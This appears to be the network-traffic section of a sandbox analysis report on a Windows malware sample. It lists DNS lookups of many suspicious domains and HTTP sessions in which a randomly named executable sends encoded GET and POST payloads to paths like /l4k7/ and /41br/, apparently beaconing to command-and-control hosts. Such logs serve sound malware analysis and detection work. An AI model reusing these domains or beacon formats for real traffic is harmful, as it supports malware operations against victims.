                                                                            Jun 19, 2024 22:41:57.018302917 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.018346071 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.018353939 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.018359900 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.018399954 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.018502951 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.018512011 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.018521070 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.018543959 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.704416037 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.704642057 CEST804979766.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:57.712109089 CEST4979780192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:58.520185947 CEST4979780192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:59.535890102 CEST4979880192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:59.541821957 CEST804979866.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:41:59.541887999 CEST4979880192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:59.543504953 CEST4979880192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:41:59.548338890 CEST804979866.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:42:00.144364119 CEST804979866.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:42:00.144546986 CEST804979866.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:42:00.148685932 CEST4979880192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:42:00.152204037 CEST4979880192.168.2.466.29.145.248
                                                                            Jun 19, 2024 22:42:00.160094976 CEST804979866.29.145.248192.168.2.4
                                                                            Jun 19, 2024 22:42:07.661030054 CEST4980080192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:42:07.666647911 CEST8049800195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:42:07.666795015 CEST4980080192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:42:07.668524981 CEST4980080192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:42:07.673362970 CEST8049800195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:42:08.242769957 CEST8049800195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:42:08.244158030 CEST8049800195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:42:08.244223118 CEST4980080192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:42:09.174088001 CEST4980080192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:42:10.192970991 CEST4980280192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:42:10.199413061 CEST8049802195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:42:10.199496031 CEST4980280192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:42:10.202162981 CEST4980280192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:42:10.208594084 CEST8049802195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:42:10.796937943 CEST8049802195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:42:10.797085047 CEST8049802195.35.39.119192.168.2.4
                                                                            Jun 19, 2024 22:42:10.797152042 CEST4980280192.168.2.4195.35.39.119
                                                                            Jun 19, 2024 22:42:11.708534956 CEST4980280192.168.2.4195.35.39.119

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jun 19, 2024 22:38:42.490446091 CEST5127753192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:38:42.904519081 CEST53512771.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:38:47.911585093 CEST5179653192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:38:48.008794069 CEST53517961.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:39:03.631973028 CEST6328153192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:39:03.959182978 CEST53632811.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:39:17.131841898 CEST5172053192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:39:17.215641022 CEST53517201.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:39:30.605298996 CEST6390953192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:39:30.864660025 CEST53639091.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:39:44.974350929 CEST6114953192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:39:45.815469027 CEST53611491.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:39:59.726075888 CEST5366753192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:39:59.760977983 CEST53536671.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:40:07.818058014 CEST6455153192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:40:07.837901115 CEST53645511.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:40:21.114712000 CEST6277153192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:40:21.440279007 CEST53627711.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:40:34.662719011 CEST6398053192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:40:35.170115948 CEST53639801.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:40:48.380465984 CEST5654553192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:40:48.396576881 CEST53565451.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:40:56.520936012 CEST5456853192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:40:56.606955051 CEST53545681.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:41:09.898093939 CEST6187053192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:41:09.938782930 CEST53618701.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:41:13.670068979 CEST5100953192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:41:13.715215921 CEST53510091.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:41:23.396356106 CEST5275253192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:41:23.408807993 CEST53527521.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:41:29.990076065 CEST5812253192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:41:30.182910919 CEST53581221.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:41:31.473953009 CEST5931153192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:41:31.762448072 CEST53593111.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:41:43.838329077 CEST6266853192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:41:43.852456093 CEST53626681.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:41:45.177553892 CEST5689053192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:41:45.462038994 CEST53568901.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:41:51.911029100 CEST6065553192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:41:51.941255093 CEST53606551.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:42:01.746081114 CEST5469653192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:42:02.099236965 CEST53546961.1.1.1192.168.2.4
                                                                            Jun 19, 2024 22:42:05.724677086 CEST5554853192.168.2.41.1.1.1
                                                                            Jun 19, 2024 22:42:05.743613005 CEST53555481.1.1.1192.168.2.4

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jun 19, 2024 22:38:42.490446091 CEST192.168.2.41.1.1.10x107aStandard query (0)www.fr2e4o.cfdA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:38:47.911585093 CEST192.168.2.41.1.1.10xc530Standard query (0)www.futuregainers.netA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:03.631973028 CEST192.168.2.41.1.1.10xe42fStandard query (0)www.shopnow321.onlineA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:17.131841898 CEST192.168.2.41.1.1.10x6d19Standard query (0)www.klimkina.proA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:30.605298996 CEST192.168.2.41.1.1.10x26c1Standard query (0)www.shahaf3d.comA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:44.974350929 CEST192.168.2.41.1.1.10xe498Standard query (0)www.againbeautywhiteskin.asiaA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:59.726075888 CEST192.168.2.41.1.1.10x448bStandard query (0)www.homeppower.comA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:07.818058014 CEST192.168.2.41.1.1.10xeeecStandard query (0)www.lenovest.xyzA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:21.114712000 CEST192.168.2.41.1.1.10x8f49Standard query (0)www.931951.comA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:34.662719011 CEST192.168.2.41.1.1.10x8dd8Standard query (0)www.srripaspocon.orgA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:48.380465984 CEST192.168.2.41.1.1.10xdfedStandard query (0)www.x5hh186z.skinA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:56.520936012 CEST192.168.2.41.1.1.10xb9d9Standard query (0)www.torentreprenad.comA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:09.898093939 CEST192.168.2.41.1.1.10x9f8bStandard query (0)www.grecanici.comA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:13.670068979 CEST192.168.2.41.1.1.10x13eaStandard query (0)www.ndhockeyprospects.comA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:23.396356106 CEST192.168.2.41.1.1.10x560dStandard query (0)www.navigate-power.boatsA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:29.990076065 CEST192.168.2.41.1.1.10xe0f1Standard query (0)www.qmancha.comA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:31.473953009 CEST192.168.2.41.1.1.10xb1e9Standard query (0)www.93v0.comA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:43.838329077 CEST192.168.2.41.1.1.10xf700Standard query (0)www.cloud-force.clubA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:45.177553892 CEST192.168.2.41.1.1.10xf6eeStandard query (0)www.leadchanges.infoA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:51.911029100 CEST192.168.2.41.1.1.10x5b38Standard query (0)www.zonenail.infoA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:42:01.746081114 CEST192.168.2.41.1.1.10x135cStandard query (0)www.fr2e4o.cfdA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:42:05.724677086 CEST192.168.2.41.1.1.10x6b10Standard query (0)www.okbharat.bestA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jun 19, 2024 22:38:42.904519081 CEST1.1.1.1192.168.2.40x107aName error (3)www.fr2e4o.cfdnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:38:48.008794069 CEST1.1.1.1192.168.2.40xc530No error (0)www.futuregainers.netfuturegainers.netCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:38:48.008794069 CEST1.1.1.1192.168.2.40xc530No error (0)futuregainers.net195.35.39.119A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:03.959182978 CEST1.1.1.1192.168.2.40xe42fNo error (0)www.shopnow321.onlineshopnow321.onlineCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:03.959182978 CEST1.1.1.1192.168.2.40xe42fNo error (0)shopnow321.online162.241.2.254A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:17.215641022 CEST1.1.1.1192.168.2.40x6d19No error (0)www.klimkina.pro185.137.235.193A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:17.215641022 CEST1.1.1.1192.168.2.40x6d19No error (0)www.klimkina.pro185.65.148.19A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:17.215641022 CEST1.1.1.1192.168.2.40x6d19No error (0)www.klimkina.pro185.137.235.77A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:17.215641022 CEST1.1.1.1192.168.2.40x6d19No error (0)www.klimkina.pro185.137.235.192A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:30.864660025 CEST1.1.1.1192.168.2.40x26c1No error (0)www.shahaf3d.comshahaf3d.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:30.864660025 CEST1.1.1.1192.168.2.40x26c1No error (0)shahaf3d.com64.46.118.35A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:45.815469027 CEST1.1.1.1192.168.2.40xe498No error (0)www.againbeautywhiteskin.asiadns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:45.815469027 CEST1.1.1.1192.168.2.40xe498No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:45.815469027 CEST1.1.1.1192.168.2.40xe498No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:45.815469027 CEST1.1.1.1192.168.2.40xe498No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:39:59.760977983 CEST1.1.1.1192.168.2.40x448bName error (3)www.homeppower.comnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:07.837901115 CEST1.1.1.1192.168.2.40xeeecNo error (0)www.lenovest.xyz162.0.213.94A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:21.440279007 CEST1.1.1.1192.168.2.40x8f49No error (0)www.931951.com172.82.177.221A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:35.170115948 CEST1.1.1.1192.168.2.40x8dd8No error (0)www.srripaspocon.orgsrripaspocon.orgCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:35.170115948 CEST1.1.1.1192.168.2.40x8dd8No error (0)srripaspocon.org15.204.0.108A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:48.396576881 CEST1.1.1.1192.168.2.40xdfedName error (3)www.x5hh186z.skinnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:56.606955051 CEST1.1.1.1192.168.2.40xb9d9No error (0)www.torentreprenad.com194.9.94.86A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:40:56.606955051 CEST1.1.1.1192.168.2.40xb9d9No error (0)www.torentreprenad.com194.9.94.85A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:09.938782930 CEST1.1.1.1192.168.2.40x9f8bNo error (0)www.grecanici.com35.214.235.206A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:13.715215921 CEST1.1.1.1192.168.2.40x13eaNo error (0)www.ndhockeyprospects.comndhockeyprospects.comCNAME (Canonical name)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:13.715215921 CEST1.1.1.1192.168.2.40x13eaNo error (0)ndhockeyprospects.com162.241.253.174A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:23.408807993 CEST1.1.1.1192.168.2.40x560dName error (3)www.navigate-power.boatsnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:30.182910919 CEST1.1.1.1192.168.2.40xe0f1No error (0)www.qmancha.com202.95.21.152A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:31.762448072 CEST1.1.1.1192.168.2.40xb1e9No error (0)www.93v0.com18.178.206.118A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:43.852456093 CEST1.1.1.1192.168.2.40xf700Server failure (2)www.cloud-force.clubnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:45.462038994 CEST1.1.1.1192.168.2.40xf6eeNo error (0)www.leadchanges.info66.96.162.149A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:41:51.941255093 CEST1.1.1.1192.168.2.40x5b38No error (0)www.zonenail.info66.29.145.248A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:42:02.099236965 CEST1.1.1.1192.168.2.40x135cName error (3)www.fr2e4o.cfdnonenoneA (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:42:05.743613005 CEST1.1.1.1192.168.2.40x6b10No error (0)www.okbharat.best188.114.97.3A (IP address)IN (0x0001)false
                                                                            Jun 19, 2024 22:42:05.743613005 CEST1.1.1.1192.168.2.40x6b10No error (0)www.okbharat.best188.114.96.3A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • www.futuregainers.net
                                                                            • www.shopnow321.online
                                                                            • www.klimkina.pro
                                                                            • www.shahaf3d.com
                                                                            • www.againbeautywhiteskin.asia
                                                                            • www.lenovest.xyz
                                                                            • 185.234.72.101
                                                                            • www.931951.com
                                                                            • www.srripaspocon.org
                                                                            • www.torentreprenad.com
                                                                            • www.grecanici.com
                                                                            • www.ndhockeyprospects.com
                                                                            • www.qmancha.com
                                                                            • www.93v0.com
                                                                            • www.leadchanges.info
                                                                            • www.zonenail.info

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449743195.35.39.119805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:38:48.022805929 CEST436OUTGET /l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+QktvoJK9v8ttAQP4wg2bLqAZCOth8+1YyfQ=&8FiTp=kJrtnVsPEnF0JV HTTP/1.1
                                                                            Host: www.futuregainers.net
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Jun 19, 2024 22:38:48.575244904 CEST1219INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            content-type: text/html
                                                                            content-length: 795
                                                                            date: Wed, 19 Jun 2024 20:38:48 GMT
                                                                            server: LiteSpeed
                                                                            location: https://www.futuregainers.net/l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+QktvoJK9v8ttAQP4wg2bLqAZCOth8+1YyfQ=&8FiTp=kJrtnVsPEnF0JV
                                                                            platform: hostinger
                                                                            content-security-policy: upgrade-insecure-requests
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449745162.241.2.254805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:03.970093012 CEST705OUTPOST /41br/ HTTP/1.1
                                                                            Host: www.shopnow321.online
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 203
                                                                            Origin: http://www.shopnow321.online
                                                                            Referer: http://www.shopnow321.online/41br/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 41 65 68 44 73 72 79 72 34 66 47 6b 71 2f 63 72 32 69 6c 56 31 4f 6d 50 36 78 6c 6b 6a 65 67 55 63 48 37 63 54 36 46 4c 77 72 76 52 5a 30 37 79 58 74 63 6c 4b 68 51 74 50 78 59 78 54 42 77 6b 53 61 79 65 49 53 30 7a 51 79 57 43 4a 72 75 36 42 71 78 5a 51 4a 74 4c 58 35 46 50 75 63 50 58 36 76 5a 46 39 54 64 37 58 35 63 64 6e 79 5a 72 53 58 51 34 7a 38 7a 75 66 73 63 47 44 67 38 34 5a 68 43 59 6e 34 35 35 4c 4e 48 65 79 77 6e 4d 76 42 48 31 63 71 57 64 50 36 49 4b 6b 57 43 34 57 2f 71 44 4c 4b 5a 42 5a 6c 71 39 36 77 66 56 44 48 6a 6d 5a 51 3d 3d
                                                                            Data Ascii: tF1tk6=37p05Z2HjoMoAehDsryr4fGkq/cr2ilV1OmP6xlkjegUcH7cT6FLwrvRZ07yXtclKhQtPxYxTBwkSayeIS0zQyWCJru6BqxZQJtLX5FPucPX6vZF9Td7X5cdnyZrSXQ4z8zufscGDg84ZhCYn455LNHeywnMvBH1cqWdP6IKkWC4W/qDLKZBZlq96wfVDHjmZQ==
                                                                            Jun 19, 2024 22:39:04.568567038 CEST1121INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:39:04 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
                                                                            Accept-Ranges: bytes
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Content-Length: 836
                                                                            Content-Type: text/html
                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                                                                            Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449746162.241.2.254805740C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 19, 2024 22:39:06.525913000 CEST725OUTPOST /41br/ HTTP/1.1
                                                                            Host: www.shopnow321.online
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 223
                                                                            Origin: http://www.shopnow321.online
                                                                            Referer: http://www.shopnow321.online/41br/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
                                                                            Data Raw: 74 46 31 74 6b 36 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 42 2f 52 44 71 4b 79 72 39 2f 47 6e 6d 66 63 72 68 79 6c 52 31 4f 36 50 36 30 45 76 6a 6f 59 55 66 6d 4c 63 42 4f 52 4c 7a 72 76 52 42 45 37 7a 54 74 63 75 4b 68 55 6c 50 7a 63 78 54 46 59 6b 53 62 43 65 4c 68 63 79 51 69 57 45 42 4c 75 34 50 4b 78 5a 51 4a 74 4c 58 35 42 6c 75 63 48 58 39 65 70 46 38 32 70 34 55 35 63 65 33 53 5a 72 42 48 51 43 7a 38 7a 41 66 75 34 38 44 6b 4d 34 5a 6a 4b 59 6e 73 6c 36 42 4e 48 69 74 67 6e 59 76 69 57 50 62 2f 6d 64 48 6f 34 65 69 57 47 4f 58 35 37 5a 61 37 34 57 4c 6c 4f 4f 6e 33 57 68 4f 45 65 76 43 57 6c 2f 6b 39 35 5a 4a 4b 51 56 44 39 62 6a 47 61 77 33 51 68 6f 3d
                                                                            Data Ascii: tF1tk6=37p05Z2HjoMoB/RDqKyr9/GnmfcrhylR1O6P60EvjoYUfmLcBORLzrvRBE7zTtcuKhUlPzcxTFYkSbCeLhcyQiWEBLu4PKxZQJtLX5BlucHX9epF82p4U5ce3SZrBHQCz8zAfu48DkM4ZjKYnsl6BNHitgnYviWPb/mdHo4eiWGOX57Za74WLlOOn3WhOEevCWl/k95ZJKQVD9bjGaw3Qho=
                                                                            Jun 19, 2024 22:39:07.024255991 CEST1121INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 19 Jun 2024 20:39:06 GMT
                                                                            Server: Apache
                                                                            Upgrade: h2,h2c
                                                                            Connection: Upgrade, close
                                                                            Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT
